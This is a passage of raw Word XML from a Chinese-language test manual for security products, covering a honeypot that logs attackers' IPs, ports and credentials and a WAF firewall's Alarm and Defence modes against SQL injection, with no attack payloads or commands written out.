            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3306</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5060</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5061/ 5060/ 11211</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4886D404" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>暴露端口：</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 42</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 69</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8081</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 443</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 445</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1433</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1723</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1883</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1900</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3306</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5060</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5061/ 5060/ 11211</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77806827" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>后如下</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>图，可以看到请求的端口、协议及详细日志等。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1428A40B"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6044F183" wp14:editId="4FF214A4">
                  <wp:extent cx="4104005" cy="1170940"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2286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101"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1170940"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="762A07D8"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="150EC08E" wp14:editId="71FDCD6B">
                  <wp:extent cx="4104005" cy="1987550"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1905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102"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1987550"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="457BDF1B"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30BE66CD" wp14:editId="137A93BA">
                  <wp:extent cx="4104005" cy="988695"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="190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103"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="988695"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2AEF8B"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60820476" wp14:editId="76F1FE0D">
                  <wp:extent cx="4104005" cy="3088640"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1016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104"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="3088640"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="56346E14"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CAC3B19" wp14:editId="36640A05">
                  <wp:extent cx="4067810" cy="1375410"/>
                  <wp:effectExtent l="0" t="0" r="21590" b="2159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105"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4067810" cy="1375410"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="346FD327" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4ABDAEAB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C846E2B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F834A13"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>得到攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5DD3F977" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69E2A1F2"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366BBA39" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2816457D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="362" w:name="_Toc36487965"/>
      <w:bookmarkStart w:id="363" w:name="_Toc36573245"/>
      <w:bookmarkStart w:id="364" w:name="_Toc36630331"/>
      <w:r w:rsidRPr="0020259A">
        <w:t>WAF防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="362"/>
      <w:bookmarkEnd w:id="363"/>
      <w:bookmarkEnd w:id="364"/>
    </w:p>
    <w:p w14:paraId="79749E87" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="365" w:name="_Toc36487966"/>
      <w:bookmarkStart w:id="366" w:name="_Toc36573246"/>
      <w:bookmarkStart w:id="367" w:name="_Toc36630332"/>
      <w:r w:rsidRPr="00536672">
        <w:t>功能介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="365"/>
      <w:bookmarkEnd w:id="366"/>
      <w:bookmarkEnd w:id="367"/>
    </w:p>
    <w:p w14:paraId="09F2A43F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>WAF防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统主要分为两大模式：Alarm和Defence模式。 Alarm模式下，进行SQL注入攻击，也可透出数据库里的信息。同时也会触发我们的自主防御功能，再次SQL注入时，将看不到数据库的信息。Defence模式下，进行SQL注入攻击，直接会看到被我们的WAF阻止了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93BA76" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="368" w:name="_Toc36487967"/>
      <w:bookmarkStart w:id="369" w:name="_Toc36573247"/>
      <w:bookmarkStart w:id="370" w:name="_Toc36630333"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试步骤</w:t>
      </w:r>
      <w:bookmarkStart w:id="371" w:name="_Toc10543"/>
      <w:bookmarkEnd w:id="368"/>
      <w:bookmarkEnd w:id="369"/>
      <w:bookmarkEnd w:id="370"/>
    </w:p>
    <w:p w14:paraId="0A6515D7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="372" w:name="_Toc36487968"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换到alarm模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="371"/>
      <w:bookmarkEnd w:id="372"/>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2FD2CBF5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63038BD5"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1A184319" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>切换到alarm模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3129E9E2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44E7407C"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76A19DA6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>手工测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="290FEC28" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FFE5141"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4A7FEF66" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WAF功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5BBDD3AF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62E374AC"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4AFFE8E3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WAF防火墙页面，点击“防护设置”按钮，在右侧页面中主机的防护类型设置中，图标在“暗”的情况下，即为alarm模式。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="569636B6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="36E136C9" wp14:editId="78FF961B">
                  <wp:extent cx="4104005" cy="2073275"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="9525"/>
                  <wp:docPr id="541" name="图片 541" descr="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larm"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId106"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2073275"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="26AB3430" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C6ECC2C"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619B8787" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="257C51F7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10FDEFBB"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78E287B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D614148" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="373" w:name="_Toc1936"/>
      <w:bookmarkStart w:id="374" w:name="_Toc36487969"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="373"/>
      <w:bookmarkEnd w:id="37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70B4E74E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="071224C0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E189910" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>发起攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1EB9BD39" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="671A9C23"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02E4CDD9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>手工测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6A48B2AD" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="569D00CF"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6034F285" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WAF防火墙功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="62EC90AE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01FB994D"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2C34DB84" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Alarm模式下的攻击，在攻击检测结果</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
